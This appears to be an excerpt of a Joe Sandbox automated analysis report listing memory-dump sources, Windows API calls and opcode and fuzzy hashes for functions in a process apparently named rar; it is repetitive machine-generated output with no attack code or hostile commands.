                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo$setbuf$ConsoleFileHandleModeType
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4044681568-0
                                                                                                                                                                                                                                        • Opcode ID: 8727ae0c8f4e6654f39e3312ee4fd5538b937ba58b7f1081e43b9e7840c2ab2c
                                                                                                                                                                                                                                        • Instruction ID: ec72cf948af36d6c9e576b3157e56773b71a7d1b8c51e43e4b57921564291c92
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8727ae0c8f4e6654f39e3312ee4fd5538b937ba58b7f1081e43b9e7840c2ab2c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 15011300E0B192A6FE2AB37516B27B919868FC2310F0841FAE01E8AAE3DD5C2C538311
                                                                                                                                                                                                                                        Function 00007FF6AA1A2440 Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2976181284-0
                                                                                                                                                                                                                                        • Opcode ID: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                                                                                                                                                                                                        • Instruction ID: 0dbaa82678a09e5e8a9efc4f98c3ed0d01fba170e0650ddd8bf129358642cde8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3601A131A19A82E1EB669B29E44027823A1EF40778F144373D53D821F5CF3CD98BC750
                                                                                                                                                                                                                                        Function 00007FF6AA1A30C8 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetFileAttributesW.KERNELBASE(00000800,00007FF6AA1A305D,?,?,?,?,?,?,?,?,00007FF6AA1B4126,?,?,?,?,00000800), ref: 00007FF6AA1A30F0
                                                                                                                                                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF6AA1B4126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF6AA1A3119
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                                                        • Opcode ID: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                                                                                                                                                                                                        • Instruction ID: 52324bf8972a3060132f2d62fa71d8caf1c9c5025fe7be9e8438798b67539fd4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 29F0A421B196C1D1EA60DB64F4543A96290BF4D7D4F400572E99CC3799DE7CDD468600
                                                                                                                                                                                                                                        Function 00007FF6AA1CB3F0 Relevance: 3.0, APIs: 2, Instructions: 28libraryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: DirectoryLibraryLoadSystem
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1175261203-0
                                                                                                                                                                                                                                        • Opcode ID: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                                                                                                                                                                                                        • Instruction ID: 2d94f2c81f0dcfae6f46323882c9ef6d0f23bb89c5f8fd09eacb665ddeaaa8ed
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 95F06821B1E581D1FA719B11E8553FA6264BF48784F804173E9CDC2659EE2CED46CA00
                                                                                                                                                                                                                                        Function 00007FF6AA1CBA70 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Process$AffinityCurrentMask
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1231390398-0
                                                                                                                                                                                                                                        • Opcode ID: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
                                                                                                                                                                                                                                        • Instruction ID: e21709d6dd26e884b0a482f46ff92a3987efb70d3ff3a0bdfdd77631102f77a8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2E02B20B3949192DBD98B1AC491FAD1390AF54F80F80207BF44BC3A54ED1CDD468B00
                                                                                                                                                                                                                                        Function 00007FF6AA1E4A74 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 485612231-0
                                                                                                                                                                                                                                        • Opcode ID: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                                                                                                                                                                                                        • Instruction ID: 9382a0c6d0a90f587c8bf0238242a09b8bb5f6ddb237a9729f6b41ebf754f66f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ECE08660F1B143D6FF669BF2D80417812D05F89B40F0844B6DD0EC6651EE2D6C934204
                                                                                                                                                                                                                                        Function 00007FF6AA1C71FC Relevance: 1.9, APIs: 1, Instructions: 353COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 17dbf89f21da43bbd654d9da3b204a736ad4fc838e231dad39fbf41b92fe687c
                                                                                                                                                                                                                                        • Instruction ID: 516255290ce3989289500dcbfbf859ec835254b38af0bb6509c73a29834f4237
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 17dbf89f21da43bbd654d9da3b204a736ad4fc838e231dad39fbf41b92fe687c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89E1D421A0A692E1FB228F2094442B967E1EF41B88F0451B7DE4D8B7D6DEACBC47C710
                                                                                                                                                                                                                                        Function 00007FF6AA1872C4 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: c7a1d2a60ffdbc43dff3a0632d536e208070f789ed259da07b8fca2f3bbe514d
                                                                                                                                                                                                                                        • Instruction ID: 0db69eefc58ad7cfb0d27474b71a9b99494ac82dacd0b2603e4b01eba780ba44
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c7a1d2a60ffdbc43dff3a0632d536e208070f789ed259da07b8fca2f3bbe514d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 83514472529BD1A4E7019F34A8441ED37A8FB44F88F18427ADE884B79ADF389462C331
                                                                                                                                                                                                                                        Function 00007FF6AA1E231C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3947729631-0
                                                                                                                                                                                                                                        • Opcode ID: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                                                                                                                                                                                                        • Instruction ID: fa2ef60411977361bbe95146c96af7a130c7f15563207c4378e655b72dc4692d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0441DE21A1B683E2FF7A9B10996027863A1AF95B40F4444BBD90EC7AD5DE3DEC478740
                                                                                                                                                                                                                                        Function 00007FF6AA194D1C Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CommandLine
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3253501508-0
                                                                                                                                                                                                                                        • Opcode ID: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                                                                                                                                                                                                        • Instruction ID: 3a79ec34c64a8deb1d34cb3a9fe27bfbcc6095ad85dd137044619f6da393bf46
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EA01C415B0E642D5EA12E716E6001BD57A0AF99B94F480473EE4D47369DE3DDC43C384
                                                                                                                                                                                                                                        Function 00007FF6AA1E4B8C Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1279760036-0
